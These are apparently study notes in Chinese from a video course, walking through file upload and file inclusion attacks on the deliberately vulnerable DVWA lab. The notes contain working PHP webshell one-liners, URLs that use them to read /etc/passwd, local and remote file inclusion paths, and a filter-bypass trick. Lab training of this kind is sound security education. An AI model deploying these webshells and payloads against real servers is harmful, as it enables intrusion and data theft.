B站 程序学习的 黑客攻防 - 记录

cc攻击:针对应用,比如恶意刷验证码
DDoS攻击:针对服务器,比如大量的http请求,超大流量的恶意访问 ← ← ← 刮刮乐

笔记来源B站视频(知识区>野生技术协会),阿婆主->程序学习
黑客攻防 从入门到入yu【網絡安全】:https://www.bilibili.com/video/BV1E4411L7zS

文章目录

文件上传漏洞原理

B站 程序学习的 黑客攻防 - 记录
实验靶机:OWASP_BrokenWeb_Apps_VM_1.2
下载地址:https://sourceforge.net/projects/owaspbwa/files/1.2/OWASP_BrokenWeb_Apps_VM_1.2.zip/download

测试渗透机:Kali_Linux
官网下载地址:https://www.kali.org/downloads/

实验原理

B站 程序学习的 黑客攻防 - 记录

实验过程

实验一:
低安全模式下,上传任意类型文件,文件不大限制

实验二:
中安全模式下,绕过类型上传文件(文件MIME类型)
修改浏览器代理为BurpSuite的代理
通过BurpSuite修改Content-Type的信息,改为 image/JPEG
实验二实现原理:
B站 程序学习的 黑客攻防 - 记录
实验三:
高安全模式,上传一句话图片木马(文件后缀名限制)

webshell

B站 程序学习的 黑客攻防 - 记录

shell2.php #eval 使用php函数,例如phpinfo();
<?php eval($_REQUEST['cmd']);?>
http://10.3.139.173/dvwa/hackable/uploads/shell2.php?cmd=phpinfo();

shell3.php #system 使用Linux系统命令,例如ls,cp,rm
<?php system($_REQUEST['yangge']);?>
http://10.3.139.173/dvwa/hackable/uploads/shell3php?yangge=cat /etc/passwd
#ip地址改为自己的

B站 程序学习的 黑客攻防 - 记录

菜刀详解+官网下载链接

中国菜刀官网:http://www.maicaidao.co/
腾讯哈勃查毒(轻度风险):https://habo.qq.com/

在文件中找到readme.txt,里面有详细使用方法

文件包含渗透 File Inclusion

项目实验环境

B站 程序学习的 黑客攻防 - 记录
本地文件包含:LFI
远程文件包含:RFI

老师手绘图
B站 程序学习的 黑客攻防 - 记录

文件包含漏洞危害及原理

B站 程序学习的 黑客攻防 - 记录

低安全级别

本地文件包含
B站 程序学习的 黑客攻防 - 记录
本地文件包含 + webshell

一句话木马脚本
<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[yangge]);?>')?>

B站 程序学习的 黑客攻防 - 记录
edjpgcom工具链接:
链接: https://pan.baidu.com/s/1JrO1IDzkLyhqn2AGh6wD2Q
提取码: nq6d

注意:图片不能太大,否则可能运行不了
B站 程序学习的 黑客攻防 - 记录
B站 程序学习的 黑客攻防 - 记录

相对路径
http://192.168.106.134/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/yangge.jpg
绝对路径
http://192.168.106.134/dvwa/vulnerabilities/fi/?page=/var/www/dvwa/hackable/uploads/yangge.jpg

远程文件包含 + webshell
建立远程服务器
安装web服务(apache2)
systemctl start apache2
vim /var/www/html/yangge.txt

<?fputs(fopen("shell50.php","w"),'<?php eval($_POST[yangge50]);?>')?>

中安全级别

**本地文件包含:**和低安全级别操作一样
**本地文件包含 + webshell:**和低安全级别操作一样

远程文件包含 + webshell
后台源码用str_replace函数只替换一个http://,那改成httphttp://

上一篇:Burpsuite之dvwa暴力破解


下一篇:DVWA之SQL Injection